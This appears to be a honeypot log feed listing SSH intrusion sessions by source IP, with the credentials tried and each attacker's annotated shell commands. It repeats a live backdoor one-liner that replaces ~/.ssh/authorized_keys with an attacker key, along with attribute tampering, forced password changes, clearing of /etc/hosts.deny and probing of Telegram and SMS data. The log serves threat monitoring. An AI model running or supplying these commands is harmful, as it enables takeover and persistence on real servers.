$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 silk_root_17 (115.190.212.78) — Beijing, China · 1 session · 1 cmd

2026-04-09 14:05 EDT · as test/123456

cat

$ cat /bin/echo

🎭 rogue_root_3 (182.93.7.194) — Macao, Macao · 3 sessions · 41 cmds

2026-04-04 05:30 EDT · as oracle/Oracle26!, root/admin, user/password

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l ×2

↳ CPU profiling

$ echo "root:OzDGbZ0abxV8"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ×2

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ×2

$ ls -lh $(which ls) ×2

$ which ls ×2

$ crontab -l ×2

↳ persistence setup

$ w ×2

↳ logged-in users check

$ uname -m ×2

$ cat /proc/cpuinfo | grep model | grep name | wc -l ×2

↳ CPU profiling

$ top ×2

↳ process monitoring

$ uname ×2

↳ OS identification

$ uname -a ×2

↳ OS/kernel identification

$ whoami ×2

↳ privilege check

$ lscpu | grep Model ×2

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ×2

$ echo -e "password\nlaFo8LcWzNN1\nlaFo8LcWzNN1"|passwd|bash

$ Enter new UNIX password:

$ echo "password\nlaFo8LcWzNN1\nlaFo8LcWzNN1\n"|passwd

🎭 eagle_root_14 (47.251.174.254) — Minkler, United States · 1 session · 1 cmd

2026-04-09 12:21 EDT · as admin/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 shadow_root_35 (202.152.204.159) — Sangkalputung, Indonesia · 3 sessions · 3 cmds

2026-04-06 15:04 EDT · as oracle/Oracle123, pi/pi, root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×3

↳ OS/kernel identification

🎭 specter_root_46 (207.46.224.89) — Singapore, Singapore · 13 sessions · 13 cmds

2026-04-06 04:27 EDT · as root/1234, root/123456, root/12345678

Credential validation (root/1234) → system identity confirmation (uptime, hostname) → hardware profiling via /proc/cpuinfo parsing → process enumeration (ps aux) → environment and network surface reconnaissance (env, netstat, mount) → SSH client version verification (ssh -V)

$ uptime

↳ uptime check

$ hostname

↳ hostname discovery

$ grep 'model name' /proc/cpuinfo 2>/dev/null | head -1 | cut -d ':' -f2- | sed 's/^ *//' | xargs || echo unknown

$ ps aux | head -10 ×3

$ pwd

$ history | tail -5

↳ history snooping

$ ls -la /

$ ssh -V

$ mount | head -5

$ env | head -10

$ netstat -tulpn | head -10

🎭 shadow_root_36 (101.36.108.125) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-09 07:31 EDT · as oracle/Oracle04!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 jade_root_12 (122.114.113.177) — Zhengzhou, China · 1 session · 2 cmds

2026-04-09 07:02 EDT · as oracle/adminadmin

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_37 (103.253.214.196) — Jakarta, Indonesia · 1 session · 20 cmds

2026-04-09 03:07 EDT · as mysql/mysql@123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql@123\nMsqIcQy97Oi7\nMsqIcQy97Oi7"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql@123\nMsqIcQy97Oi7\nMsqIcQy97Oi7\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 ghost_root_62 (81.192.46.45) — Rabat, Morocco · 1 session · 20 cmds

2026-04-09 03:07 EDT · as admin/admin123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "admin123\n0PMHD4JyiqMj\n0PMHD4JyiqMj"|passwd|bash

$ Enter new UNIX password:

$ echo "admin123\n0PMHD4JyiqMj\n0PMHD4JyiqMj\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 star_root_11 (172.171.233.230) — Boydton, United States · 1 session · 20 cmds

2026-04-09 03:01 EDT · as admin/admin123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "admin123\n7s7bjd520z4D\n7s7bjd520z4D"|passwd|bash

$ Enter new UNIX password:

$ echo "admin123\n7s7bjd520z4D\n7s7bjd520z4D\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 burger_root_7 (45.17.39.120) — Birmingham, United States · 1 session · 20 cmds

2026-04-09 02:56 EDT · as mysql/mysql@123

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa..." → cat /proc/cpuinfo | grep name | wc -l → echo "mysql@123\nDbyxoFCXCoj0\nDbyxoFCXCoj0"|passwd|bash →

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql@123\nDbyxoFCXCoj0\nDbyxoFCXCoj0"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql@123\nDbyxoFCXCoj0\nDbyxoFCXCoj0\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 cipher_root_56 (103.89.94.39) — Quận Một, Vietnam · 1 session · 20 cmds

2026-04-09 02:48 EDT · as mysql/mysql@123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql@123\nPfiEBsPh0tEo\nPfiEBsPh0tEo"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql@123\nPfiEBsPh0tEo\nPfiEBsPh0tEo\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 liberty_root_13 (15.204.249.142) — Reston, United States · 1 session · 20 cmds

2026-04-09 02:48 EDT · as mysql/mysql@123

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" → cat /proc/cpuinfo | grep name | wc

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql@123\n3oLWbEDU2AN8\n3oLWbEDU2AN8"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql@123\n3oLWbEDU2AN8\n3oLWbEDU2AN8\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 star_root_12 (38.114.121.110) — Chicago, United States · 1 session · 20 cmds

2026-04-09 02:46 EDT · as mysql/mysql@123

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa..." → cat /proc/cpuinfo | grep name | wc -l → echo -e "mysql@123\n..."|passwd|bash → Enter new UNIX password: → echo "mysql@123\n

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "mysql@123\nb7949hCdaCDb\nb7949hCdaCDb"|passwd|bash

$ Enter new UNIX password:

$ echo "mysql@123\nb7949hCdaCDb\nb7949hCdaCDb\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 lantern_root_21 (221.213.129.46) — Kunming, China · 1 session · 2 cmds

2026-04-09 02:38 EDT · as oracle/oRACLE

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 meatball_root (171.25.158.54) — Vaxjo, Sweden · 2 sessions · 2 cmds

2026-04-08 07:23 EDT · as oracle/1qaz@WSX, oracle/oracle1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 panda_root_17 (139.170.141.213) — Xining, China · 1 session · 1 cmd

2026-04-08 20:10 EDT · as oracle/1qaz@WSX

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 cipher_root_57 (155.102.201.82) — Bangkok, Thailand · 1 session · 1 cmd

2026-04-08 18:16 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 specter_sol_5 (157.66.26.151) — Go Vap, Vietnam · 1 session · 20 cmds

2026-04-08 13:36 EDT · as sol/123

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" → cat /proc/cpuinfo | grep name | wc

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "123\n0hbcMYWCfxmQ\n0hbcMYWCfxmQ"|passwd|bash

$ Enter new UNIX password:

$ echo "123\n0hbcMYWCfxmQ\n0hbcMYWCfxmQ\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 jade_root_13 (119.166.199.17) — Qingdao, China · 1 session · 9 cmds

2026-04-08 12:21 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 seoul_root_8 (125.141.84.135) — Gwanak-gu, South Korea · 2 sessions · 8 cmds

2026-03-21 06:19 EDT · as admin/admin, root/root

sh → shell → enable → cat

$ sh ×2

$ shell ×2

$ enable ×2

$ cat /bin/echo||while read i; do echo $i; done < /proc/self/exe; ×2

🎭 cipher_root_58 (23.97.62.113) — Singapore, Singapore · 5 sessions · 5 cmds

2026-03-26 05:03 EDT · as root/1234, root/123456, root/12345678

netstat → history snooping → lscpu → OS/kernel identification → hostname discovery

$ netstat -tulpn | head -10

$ history | tail -5

↳ history snooping

$ lscpu | grep 'Architecture' | head -1

$ uname -a

↳ OS/kernel identification

$ hostname

↳ hostname discovery

🎭 fog_root_9 (82.153.157.222) — London, United Kingdom · 1 session · 2 cmds

2026-04-08 11:47 EDT · as oracle/oracle6

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_63 (152.200.181.42) — Belén, Colombia · 1 session · 2 cmds

2026-04-08 10:54 EDT · as oracle/oracle123!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 bonsai_root_2 (152.32.144.167) — Tokyo, Japan · 1 session · 2 cmds

2026-04-08 10:45 EDT · as oracle/oracle123!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

